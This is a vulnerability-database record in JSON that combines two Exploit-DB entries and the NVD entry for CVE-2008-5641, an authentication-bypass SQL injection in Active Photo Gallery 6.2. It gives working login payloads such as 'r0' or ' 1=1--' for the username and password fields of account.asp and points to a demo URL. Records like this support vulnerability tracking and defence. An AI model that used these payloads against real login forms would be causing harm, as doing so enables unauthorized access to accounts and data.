{"id": "EDB-ID:7299", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Active Photo Gallery 6.2 Auth Bypass SQL Injection Vulnerability", "description": "Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability. CVE-2008-5641. Webapps exploit for php platform", "published": "2008-11-30T00:00:00", "modified": "2008-11-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7299/", "reporter": "R3d-D3V!L", "references": [], "cvelist": ["CVE-2008-5641"], "lastseen": "2016-02-01T01:54:16", "viewCount": 6, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-02-01T01:54:16", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5641"]}, {"type": "exploitdb", "idList": ["EDB-ID:10521"]}], "modified": "2016-02-01T01:54:16", "rev": 2}, "vulnersScore": 7.6}, "sourceHref": "https://www.exploit-db.com/download/7299/", "sourceData": "[~] ----------------------------\u00d8\u00a8\u00d8\u00b3\u00d9\u2026 \u00d8\u00a7\u00d9\u201e\u00d9\u201e\u00d9\u2021 \u00d8\u00a7\u00d9\u201e\u00d8\u00b1\u00d8\u00ad\u00d9\u2026\u00d9\u2020 \u00d8\u00a7\u00d9\u201e\u00d8\u00b1\u00d8\u00ad\u00d9\u0160\u00d9\u2026------------------------------\n [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability\n \n [~]Vendor:www.activewebsoftwares.com\n \n [~]Software: Active Photo Gallery v 6.2\n \n [~]author: ((\u00d1\u008f3d D3v!L))\n \n [~] Date: 28.11.2008\n \n [~] Home: www.ahacker.biz\n \n [~] contact: N/A\n\n[~] -----------------------------{str0ke}------------------------------\n \n \n [~] Exploit:\n \n username: r0' or ' 1=1--\n password: r0' or ' 1=1--\n \n \n [~]login 4 d3m0:\n \n http://www.activewebsoftwares.com/demoactivephotogallery/account.asp\n \n [~]-----------------------------{str0ke}---------------------------------------------------\n \n [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker\n [~]\n [~] spechial thanks : dolly & 7am3m & \u00d8\u00b9\u00d9\u2026\u00d8\u00a7\u00d8\u00af ,\u00d8\u00a7\u00d9\u201e\u00d8\u00b2\u00d9\u2021\u00d9\u0160\u00d8\u00b1\u00d9\u0160\n [~]\n [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller\n [~]\n [~] xp10.biz & ahacker.biz\n [~]\n \n [~]--------------------------------------------------------------------------------\n\n# milw0rm.com [2008-11-30]\n", "osvdbidlist": ["50388"]}

{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "SQL injection vulnerability in account.asp in Active Photo Gallery 6.2 allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.", "edition": 3, "cvss3": {}, "published": "2008-12-17T17:30:00", "title": "CVE-2008-5641", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5641"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:activewebsoftwares:active_photo_gallery:6.2"], "id": "CVE-2008-5641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:activewebsoftwares:active_photo_gallery:6.2:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T12:39:58", "description": "Active Photo Gallery v 6.2 (Auth Bypass) Remote SQL Injection. CVE-2008-5641. Webapps exploit for asp platform", "published": "2009-12-17T00:00:00", "type": "exploitdb", "title": "Active Photo Gallery 6.2 - Auth Bypass Remote SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5641"], "modified": "2009-12-17T00:00:00", "id": "EDB-ID:10521", "href": "https://www.exploit-db.com/exploits/10521/", "sourceData": "[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????\r\n[?]\r\n[~] Tybe: (Auth Bypass) Remote SQL Injection Vulnerability‏\r\n[?]\r\n[~] Vendor: www.activewebsoftwares.com\r\n[?]\r\n[?] Software: Active Photo Gallery v 6.2\r\n[?]\r\n[?] author: ((R3d-D3v!L))\r\n[?]\r\n[?] Date: 17.dec.2009\r\n[?] T!ME: 10:22 pm\r\n[?] Home: WwW.xP10.ME\r\n[?]\r\n[?] contact: X@hotmail.co.jp\r\n[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????\r\n\r\n\r\n[?] Exploit:\r\n\r\n\r\n\r\n[?] E-/\\/\\A!L : x' or ' 1=1\r\n\r\n[?] password : x' or ' 1=1\r\n\r\n\r\n\r\n[?]demo:\r\n\r\n\r\n[?]https://server/demoactivephotogallery/account.asp\r\n\r\n\r\n\r\nN073:\r\nREAL RED DEV!L W@S h3r3 LAMERZ\r\n\r\nGAZA !N our hearts !\r\n\r\n\r\n\r\n[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}-----------------------------------------------------\r\n\r\n[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987\r\n\r\n[~]70 ِALL ARAB!AN HACKER 3X3PT : LAM3RZ\r\n\r\n[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4\r\n\r\n[?]spechial SupP0RT: MY M!ND ;) & dookie2000ca & ((OFFsec))\r\n\r\n[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA\r\n\r\n[~]spechial FR!ND: 74M3M\r\n\r\n[~] !'M 4R48!4N 3XPL0!73R.\r\n\r\n[~]{[(D!R 4ll 0R D!E)]};\r\n\r\n[~]--------------------------------------------------------------------------------", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10521/"}]}